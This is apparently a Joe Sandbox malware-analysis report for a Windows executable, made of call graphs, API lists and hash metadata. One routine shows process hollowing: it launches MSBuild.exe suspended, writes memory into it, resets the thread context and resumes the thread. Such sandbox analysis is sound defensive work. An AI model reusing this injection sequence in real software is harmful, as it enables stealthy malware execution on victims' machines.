__ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21890->21891 21892 6f1ca4 21891->21892 21897 7064d5 GetModuleHandleW 21892->21897 22106 70cb08 21893->22106 21896->21855 21897->21863 21898->21865 21899->21868 21900->21849 21901->21853 21902->21872 21903->21874 21908 7154a5 21904->21908 21907 7078e4 7 API calls 2 library calls 21907->21875 21909 7154b5 21908->21909 21910 702513 21908->21910 21909->21910 21912 714c19 21909->21912 21910->21878 21910->21907 21913 714c20 21912->21913 21914 714c63 GetStdHandle 21913->21914 21915 714cc5 21913->21915 21916 714c76 GetFileType 21913->21916 21914->21913 21915->21909 21916->21913 21917->21882 21919 6f248c 21918->21919 21935 6fa920 21919->21935 21922 6f24b0 21924 6f24e0 21922->21924 22003 6f47f0 21924->22003 21928 6f2806 21929 702303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21928->21929 21930 6f2811 21929->21930 21930->21888 21932 6f2590 21933 6f25a4 21932->21933 22007 7014f0 21932->22007 22010 6f4b70 21933->22010 21934->21890 21944 6faa60 21935->21944 21939 6fa962 21960 6faaf0 21939->21960 21941 6fa978 21942 702303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21941->21942 21943 6f1c52 21942->21943 21943->21922 21966 701280 21944->21966 21947 702303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21948 6fa94d 21947->21948 21949 6fa9d0 21948->21949 21950 6faa2b 21949->21950 21951 6fa9eb 21949->21951 21953 70228f std::ios_base::_Init 16 API calls 21950->21953 21951->21950 21952 6fa9fc 21951->21952 21975 70228f 21952->21975 21954 6faa3c 21953->21954 21988 6fabc0 135 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 21954->21988 21957 6faa1d 21957->21939 21961 6fab04 21960->21961 21963 6fab18 21961->21963 22001 6f2b40 40 API calls CallUnexpected 21961->22001 21964 6fab31 21963->21964 22002 6f2b40 40 API calls CallUnexpected 21963->22002 21964->21941 21971 7012d0 21966->21971 21969 702303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21970 6faa8d 21969->21970 21970->21947 21972 7012f9 21971->21972 21973 702303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21972->21973 21974 7012b0 21973->21974 21974->21969 21977 702294 21975->21977 21978 6faa0d 21977->21978 21980 7022b0 21977->21980 21989 710ccc 21977->21989 21996 70ccef EnterCriticalSection LeaveCriticalSection std::ios_base::_Init 21977->21996 21987 6fab80 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 21978->21987 21981 705f77 std::ios_base::_Init 21980->21981 21983 7022ba Concurrency::cancel_current_task 21980->21983 21998 707223 RaiseException 21981->21998 21997 707223 RaiseException 21983->21997 21984 705f93 21986 702dd9 21987->21957 21988->21957 21995 7131c1 __dosmaperr 21989->21995 21990 7131ff 22000 70eb64 14 API calls __dosmaperr 21990->22000 21992 7131ea RtlAllocateHeap 21993 7131fd 21992->21993 21992->21995 21993->21977 21995->21990 21995->21992 21999 70ccef EnterCriticalSection LeaveCriticalSection std::ios_base::_Init 21995->21999 21996->21977 21997->21986 21998->21984 21999->21995 22000->21993 22004 6f4810 22003->22004 22006 6f482d 22004->22006 22018 6f4c90 40 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 22004->22018 22006->21932 22019 7050c2 22007->22019 22011 6f4b95 22010->22011 22086 6f9760 22011->22086 22014 6f4bc0 22015 6f4bd4 22014->22015 22016 6f4bef 22015->22016 22105 6fa580 40 API calls 22015->22105 22016->21928 22018->22006 22022 704b30 22019->22022 22023 701531 22022->22023 22024 704b56 codecvt 22022->22024 22023->21933 22024->22023 22026 704cf2 22024->22026 22028 704d19 22026->22028 22030 704d20 22026->22030 22027 702303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 22029 704e1e 22027->22029 22028->22027 22029->22024 22030->22028 22032 704dd2 22030->22032 22034 704d6b 22030->22034 22032->22028 22038 71088d 69 API calls _Fputc 22032->22038 22034->22028 22035 704915 22034->22035 22039 7101f7 22035->22039 22037 704923 22037->22028 22038->22028 22040 71020a _Fputc 22039->22040 22043 710399 22040->22043 22042 710219 _Fputc 22042->22037 22044 7103a5 ___scrt_is_nonwritable_in_current_image 22043->22044 22045 7103d1 22044->22045 22046 7103ac 22044->22046 22054 709ee4 EnterCriticalSection 22045->22054 22084 70f3f8 29 API calls 2 library calls 22046->22084 22049 7103e0 22055 71022d 22049->22055 22050 7103c7 22050->22042 22054->22049 22056 710252 22055->22056 22057 710264 22055->22057 22058 710365 _Fputc 66 API calls 22056->22058 22059 7168c0 _Fputc 29 API calls 22057->22059 22072 71025c 22058->22072 22060 71026b 22059->22060 22061 7168c0 _Fputc 29 API calls 22060->22061 22066 710293 22060->22066 22065 71027c 22061->22065 22062 702303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 22063 710363 22062->22063 22085 710421 LeaveCriticalSection __fread_nolock 22063->22085 22064 710349 22068 710365 _Fputc 66 API calls 22064->22068 22065->22066 22069 7168c0 _Fputc 29 API calls 22065->22069 22066->22064 22067 7168c0 _Fputc 29 API calls 22066->22067 22071 7102c6 22067->22071 22068->22072 22070 710288 22069->22070 22073 7168c0 _Fputc 29 API calls 22070->22073 22074 7168c0 _Fputc 29 API calls 22071->22074 22083 7102e9 22071->22083 22072->22062 22073->22066 22077 7102d2 22074->22077 22075 710301 22076 7165ec _Fputc 41 API calls 22075->22076 22078 710313 22076->22078 22079 7168c0 _Fputc 29 API calls 22077->22079 22077->22083 22078->22072 22081 710096 _Fputc 66 API calls 22078->22081 22080 7102de 22079->22080 22082 7168c0 _Fputc 29 API calls 22080->22082 22081->22078 22082->22083 22083->22064 22083->22075 22084->22050 22085->22050 22089 6f97b0 22086->22089 22090 6f989c 22089->22090 22091 6f97f4 22089->22091 22092 702303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 22090->22092 22095 6f9814 22091->22095 22101 707223 RaiseException 22091->22101 22093 6f27f3 22092->22093 22093->22014 22102 6f98b0 38 API calls std::ios_base::_Init 22095->22102 22097 6f986f 22103 6f98f0 31 API calls 2 library calls 22097->22103 22099 6f9884 22104 707223 RaiseException 22099->22104 22101->22095 22102->22097 22103->22099 22104->22090 22105->22016 22107 70cb35 22106->22107 22108 70cb47 22106->22108 22133 7064d5 GetModuleHandleW 22107->22133 22118 70cca2 22108->22118 22111 70cb3a 22111->22108 22134 70ca3c GetModuleHandleExW 22111->22134 22113 70c9ce 22113->21850 22117 70cb99 22119 70ccae ___scrt_is_nonwritable_in_current_image 22118->22119 22140 70f547 EnterCriticalSection 22119->22140 22121 70ccb8 22141 70cb9f 22121->22141 22123 70ccc5 22145 70cce3 22123->22145 22126 70cad7 22150 70cabe 22126->22150 22128 70cae1 22129 70caf5 22128->22129 22130 70cae5 GetCurrentProcess TerminateProcess 22128->22130 22131 70ca3c CallUnexpected 3 API calls 22129->22131 22130->22129 22132 70cafd ExitProcess 22131->22132 22133->22111 22135 70ca7b GetProcAddress 22134->22135 22136 70ca9c 22134->22136 22135->22136 22137 70ca8f 22135->22137 22138 70caa2 FreeLibrary 22136->22138 22139 70caab 22136->22139 22137->22136 22138->22139 22139->22108 22140->22121 22142 70cbab ___scrt_is_nonwritable_in_current_image CallUnexpected 22141->22142 22144 70cc0f CallUnexpected 22142->22144 22148 70e86e 14 API calls 3 library calls 22142->22148 22144->22123 22149 70f55e LeaveCriticalSection 22145->22149 22147 70cb7e 22147->22113 22147->22126 22148->22144 22149->22147 22153 7168fc 22150->22153 22152 70cac3 CallUnexpected 22152->22128 22155 71690b CallUnexpected 22153->22155 22154 716918 22154->22152 22155->22154 22157 714077 22155->22157 22160 7141c4 22157->22160 22161 714093 22160->22161 22162 7141f4 22160->22162 22161->22154 22162->22161 22167 7140f9 22162->22167 22165 71420e GetProcAddress 22165->22161 22166 71421e std::_Lockit::_Lockit 22165->22166 22166->22161 22169 71410a ___vcrt_InitializeCriticalSectionEx 22167->22169 22168 7141a0 22168->22161 22168->22165 22169->22168 22170 714128 LoadLibraryExW 22169->22170 22174 714176 LoadLibraryExW 22169->22174 22171 714143 GetLastError 22170->22171 22172 7141a7 22170->22172 22171->22169 22172->22168 22173 7141b9 FreeLibrary 22172->22173 22173->22168 22174->22169 22174->22172 22348 6fd320 134 API calls 3 library calls 22350 707723 54 API calls 2 library calls 22352 706f27 30 API calls 22354 6faf30 50 API calls 22251 702113 32 API calls std::_Throw_Cpp_error 22356 722315 IsProcessorFeaturePresent 22252 719119 49 API calls 3 library calls 22361 6f1b00 6 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 22363 704f09 57 API calls 2 library calls 22364 709f0c 15 API calls 2 library calls 22256 6fad10 61 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 22367 6f2bf0 30 API calls 22260 703dd2 45 API calls 2 library calls 22369 709fd4 73 API calls 2 library calls 22261 7181d4 11 API calls __Getctype 22375 7133cd 16 API calls __dosmaperr 22266 7165b2 41 API calls _Fputc 21675 702b92 21698 702b03 GetModuleHandleExW 21675->21698 21678 702bd8 21680 702b03 Concurrency::details::_Reschedule_chore GetModuleHandleExW 21678->21680 21682 702bde 21680->21682 21684 702bff 21682->21684 21720 702ae6 GetModuleHandleExW 21682->21720 21700 6fe620 21684->21700 21686 702bef 21686->21684 21687 702bf5 FreeLibraryWhenCallbackReturns 21686->21687 21687->21684 21689 702b03 Concurrency::details::_Reschedule_chore GetModuleHandleExW 21690 702c15 21689->21690 21691 6fb920 47 API calls 21690->21691 21696 702c43 21690->21696 21692 702c21 21691->21692 21693 705c60 ReleaseSRWLockExclusive 21692->21693 21694 702c34 21693->21694 21694->21696 21721 7056ac WakeAllConditionVariable 21694->21721 21699 702b19 21698->21699 21699->21678 21709 6fb920 21699->21709 21722 6f4f90 21700->21722 21702 6fe641 std::_Throw_Cpp_error 21726 6ff590 21702->21726 21705 6fe66f 21734 702303 21705->21734 21707 6fe679 21707->21689 21710 6fb934 std::_Throw_Cpp_error 21709->21710 21821 705c4f 21710->21821 21714 6fb951 21715 6fb96d 21714->21715 21825 702d23 40 API calls 2 library calls 21714->21825 21717 705c60 21715->21717 21718 705c7b 21717->21718 21719 705c6d ReleaseSRWLockExclusive 21717->21719 21718->21678 21719->21718 21720->21686 21721->21696 21723 6f4fc0 21722->21723 21724 702303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21723->21724 21725 6f4fcd 21724->21725 21725->21702 21727 6f4f90 5 API calls 21726->21727 21728 6ff5b1 std::_Throw_Cpp_error 21727->21728 21741 7003e0 21728->21741 21729 6ff5c3 21730 702303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21729->21730 21731 6fe667 21730->21731 21733 6fe6b0 CloseThreadpoolWork std::_Throw_Cpp_error 21731->21733 21733->21705 21735 70230b 21734->21735 21736 70230c IsProcessorFeaturePresent 21734->21736 21735->21707 21738 706086 21736->21738 21820 70616c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 21738->21820 21740 706169 21740->21707 21742 7003f7 21741->21742 21747 700530 21742->21747 21744 7003fe std::_Throw_Cpp_error 21746 700406 21744->21746 21754 7005f0 21744->21754 21746->21729 21759 6fd930 21747->21759 21749 700557 21762 6fda60 21749->21762 21752 702303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21753 7005b1 21752->21753 21753->21744 21769 700630 21754->21769 21757 702303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21758 700620 21757->21758 21758->21746 21760 6fb920 47 API calls 21759->21760 21761 6fd94e 21760->21761 21761->21749 21765 6fb9d0 21762->21765 21766 6fb9e1 std::_Throw_Cpp_error 21765->21766 21767 705c60 ReleaseSRWLockExclusive 21766->21767 21768 6fb9e9 21767->21768 21768->21752 21770 700651 21769->21770 21779 700800 21770->21779 21772 700691 21782 700790 21772->21782 21776 7006b7 21777 702303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21776->21777 21778 700613 21777->21778 21778->21757 21789 700940 21779->21789 21781 700820 21781->21772 21783 7007b4 21782->21783 21804 7008d0 21783->21804 21785 7007cf 21786 702303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21785->21786 21787 7006a1 21786->21787 21788 7006d0 134 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 21787->21788 21788->21776 21790 700971 21789->21790 21795 7009b0 21790->21795 21792 700984 21793 702303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21792->21793 21794 70099b 21793->21794 21794->21781 21796 7009c7 21795->21796 21799 7009f0 21796->21799 21798 7009d5 21798->21792 21800 700a0d 21799->21800 21801 700a15 Concurrency::details::_ContextCallback::_CallInContext 21800->21801 21803 700a40 31 API calls 2 library calls 21800->21803 21801->21798 21803->21801 21805 7008e4 Concurrency::details::_ContextCallback::_CallInContext 21804->21805 21807 7008ec Concurrency::details::_ContextCallback::_CallInContext 21805->21807 21813 702eaa RaiseException Concurrency::cancel_current_task CallUnexpected 21805->21813 21810 700b60 21807->21810 21814 700c00 21810->21814 21817 700c20 21814->21817 21818 6fbdb0 Concurrency::details::_ContextCallback::_CallInContext 125 API calls 21817->21818 21819 700909 21818->21819 21819->21785 21820->21740 21826 705c7f GetCurrentThreadId 21821->21826 21824 702d23 40 API calls 2 library calls 21827 705cc8 21826->21827 21828 705ca9 21826->21828 21830 705cd1 21827->21830 21831 705ce8 21827->21831 21829 705cae AcquireSRWLockExclusive 21828->21829 21837 705cbe 21828->21837 21829->21837 21832 705cdc AcquireSRWLockExclusive 21830->21832 21830->21837 21833 705d47 21831->21833 21840 705d00 21831->21840 21832->21837 21835 705d4e TryAcquireSRWLockExclusive 21833->21835 21833->21837 21834 702303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21836 6fb93c 21834->21836 21835->21837 21836->21714 21836->21824 21837->21834 21839 705d37 TryAcquireSRWLockExclusive 21839->21837 21839->21840 21840->21837 21840->21839 21841 706a0d GetSystemTimePreciseAsFileTime GetSystemTimeAsFileTime __aulldiv __aullrem __Xtime_get_ticks 21840->21841 21841->21840 22175 72f19e 22182 72f1d4 22175->22182 22176 72f321 GetPEB 22177 72f333 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 22176->22177 22178 72f3da WriteProcessMemory 22177->22178 22177->22182 22179 72f41f 22178->22179 22180 72f461 WriteProcessMemory Wow64SetThreadContext ResumeThread 22179->22180 22181 72f424 WriteProcessMemory 22179->22181 22181->22179 22182->22176 22182->22177 22274 70219d 78 API calls std::_Throw_Cpp_error 22275 6f2d80 14 API calls 22378 6f5380 98 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 22276 701d80 21 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 22278 709d8f 7 API calls ___scrt_uninitialize_crt

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0072F110,0072F100), ref: 0072F334
                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0072F347
                                                                                                          • Wow64GetThreadContext.KERNEL32(0000009C,00000000), ref: 0072F365
                                                                                                          • ReadProcessMemory.KERNELBASE(00000048,?,0072F154,00000004,00000000), ref: 0072F389
                                                                                                          • VirtualAllocEx.KERNELBASE(00000048,?,?,00003000,00000040), ref: 0072F3B4
                                                                                                          • WriteProcessMemory.KERNELBASE(00000048,00000000,?,?,00000000,?), ref: 0072F40C
                                                                                                          • WriteProcessMemory.KERNELBASE(00000048,00400000,?,?,00000000,?,00000028), ref: 0072F457
                                                                                                          • WriteProcessMemory.KERNELBASE(00000048,?,?,00000004,00000000), ref: 0072F495
                                                                                                          • Wow64SetThreadContext.KERNEL32(0000009C,00BF0000), ref: 0072F4D1
                                                                                                          • ResumeThread.KERNELBASE(0000009C), ref: 0072F4E0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                          • API String ID: 2687962208-3857624555
                                                                                                          • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                          • Instruction ID: a431ce96ab2c276368a4bc9dc47659e982edf90736376f5a984cabb8afdf5592
                                                                                                          • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                          • Instruction Fuzzy Hash: 8DB1F67664068AAFDB60CF68CC80BDA73B5FF88714F158125EA08AB341D774FA51CB94

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 26 7140f9-714105 27 714197-71419a 26->27 28 7141a0 27->28 29 71410a-71411b 27->29 30 7141a2-7141a6 28->30 31 714128-714141 LoadLibraryExW 29->31 32 71411d-714120 29->32 35 714143-71414c GetLastError 31->35 36 7141a7-7141b7 31->36 33 7141c0-7141c2 32->33 34 714126 32->34 33->30 40 714194 34->40 37 714185-714192 35->37 38 71414e-714160 call 7176c1 35->38 36->33 39 7141b9-7141ba FreeLibrary 36->39 37->40 38->37 43 714162-714174 call 7176c1 38->43 39->33 40->27 43->37 46 714176-714183 LoadLibraryExW 43->46 46->36 46->37
                                                                                                          APIs
                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,48E58DFA,?,00714208,006F3E32,?,00000000,?), ref: 007141BA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeLibrary
                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                          • API String ID: 3664257935-537541572
                                                                                                          • Opcode ID: 5e6220a47ca8c076436b9cb33a8858b9d6029a0a9a7dadcceeedcf6bfd687558
                                                                                                          • Instruction ID: d9aa79ed245f5da9ec4e09976854cc6050ad832fd8d1abb41f446a70aa9773f8
                                                                                                          • Opcode Fuzzy Hash: 5e6220a47ca8c076436b9cb33a8858b9d6029a0a9a7dadcceeedcf6bfd687558
                                                                                                          • Instruction Fuzzy Hash: 24210272A00219FBD7319B6CEC45ADA3768DB617A0B344220FD02A72D1E63CEEC1D690

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$CloseCreateHandleSize
                                                                                                          • String ID:
                                                                                                          • API String ID: 1378416451-0
                                                                                                          • Opcode ID: cc705a4b79f6efbf5b12e02867ae5374e74948cc3806c233c1d4bcf5d72d77ad
                                                                                                          • Instruction ID: a7f55f3941d666ff9706f97a541fa08e078295983fab39ff5cc6b1fc89209e16
                                                                                                          • Opcode Fuzzy Hash: cc705a4b79f6efbf5b12e02867ae5374e74948cc3806c233c1d4bcf5d72d77ad
                                                                                                          • Instruction Fuzzy Hash: CC71BFB0D04248CFDB50EFA8D5887ADBBF1BF09344F10842AE899AB355D734A945CF96

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 81 6f8730-6f8795 82 6f879b-6f87ac 81->82 83 6f87d0-6f87f3 call 6f6a80 81->83 84 6f87c4-6f87ca 82->84 85 6f87b2-6f87be 82->85 88 6f880a-6f8822 83->88 89 6f87f9-6f8805 83->89 84->83 85->84 91 6f887b 88->91 92 6f8828-6f8838 88->92 90 6f8880-6f89c0 call 711170 call 710ca4 call 711170 call 6f49d0 call 6f6aa0 call 6f4a00 call 6f6bb0 call 6f6c50 call 6f6c10 call 6f49d0 call 6f6c70 call 6f4a00 call 6f6d80 call 6f6db0 89->90 124 6f89c6-6f89f1 call 6f92f0 call 6f6c50 90->124 125 6f89f3-6f89fa 90->125 91->90 92->91 94 6f883e-6f884f 92->94 96 6f886c-6f8875 94->96 97 6f8855-6f8866 94->97 96->91 97->91 97->96 124->125 127 6f8b21-6f8b3a call 6f1dc0 call 6f6ee0 125->127 128 6f8a00-6f8a09 125->128 142 6f8b56-6f8b60 127->142 143 6f8b40-6f8b50 call 6f6ee0 127->143 130 6f8a0f-6f8a1b 128->130 131 6f8a20-6f8a26 128->131 134 6f8a2c-6f8a4c call 6f6c50 130->134 131->134 141 6f8a52-6f8a66 134->141 145 6f8a6c-6f8a81 141->145 146 6f8aa7-6f8aaf 141->146 144 6f8b76-6f8b90 call 6f6a80 142->144 143->142 160 6f8b65-6f8b70 call 6f6ee0 143->160 158 6f8b96-6f8ba0 144->158 159 6f8c81-6f8c8b 144->159 145->146 149 6f8a87-6f8aa1 145->149 151 6f8aba-6f8b02 call 6f6dd0 146->151 152 6f8ab5-6f8b1c 146->152 149->146 162 6f8b08-6f8b11 151->162 163 6f8b17 151->163 152->127 158->159 164 6f8ba6-6f8c7c call 6f6f00 call 6f6c50 call 6f6f80 158->164 165 6f8d7e-6f8e04 call 6f6c50 call 6f6f80 159->165 166 6f8c91-6f8d79 call 6f6c50 call 6f6f80 call 6f6f00 159->166 160->144 162->163 163->141 184 6f8e0c-6f8e82 call 6f6c50 call 6f6f80 164->184 181 6f8e07 165->181 166->181 181->184 189 6f8e87-6f8f2c call 6f7010 call 6f6f00 call 6f1e70 * 2 call 702303 184->189
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _strcspn
                                                                                                          • String ID: @
                                                                                                          • API String ID: 3709121408-2766056989
                                                                                                          • Opcode ID: c7af82fd3bac9b7b15a1be9194e777d64f73765121b2be7be8f3fa6c226d3602
                                                                                                          • Instruction ID: 99eef2e9ded0b1b46f1aadd5ec1ca828e065befd7829f82bacf4677e60305ee8
                                                                                                          • Opcode Fuzzy Hash: c7af82fd3bac9b7b15a1be9194e777d64f73765121b2be7be8f3fa6c226d3602
                                                                                                          • Instruction Fuzzy Hash: 6232C3B49052698FCB14DF28C981AEDBBF1BF48300F0585DAE989A7351D734AE85CF91

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConsoleFreeProtectVirtual
                                                                                                          • String ID: @
                                                                                                          • API String ID: 621788221-2766056989
                                                                                                          • Opcode ID: b8052cee7bec4dffcbcffb5b3d4ae5306ef7feead36326af2957320c8e9b94e7
                                                                                                          • Instruction ID: cfafc5cf74df654f09018f15e40d34c4df05d035fd70f18b5dbdc15248618941
                                                                                                          • Opcode Fuzzy Hash: b8052cee7bec4dffcbcffb5b3d4ae5306ef7feead36326af2957320c8e9b94e7
                                                                                                          • Instruction Fuzzy Hash: 1941EFB0900208DFDB04DFA9D8946AEBBF1EF48354F108429E858AB351D779A984CF95

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32(0070C9E4,?,0070CB99,00000000,?,?,0070C9E4,48E58DFA,?,0070C9E4), ref: 0070CAE8
                                                                                                          • TerminateProcess.KERNEL32(00000000,?,0070CB99,00000000,?,?,0070C9E4,48E58DFA,?,0070C9E4), ref: 0070CAEF
                                                                                                          • ExitProcess.KERNEL32 ref: 0070CB01
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
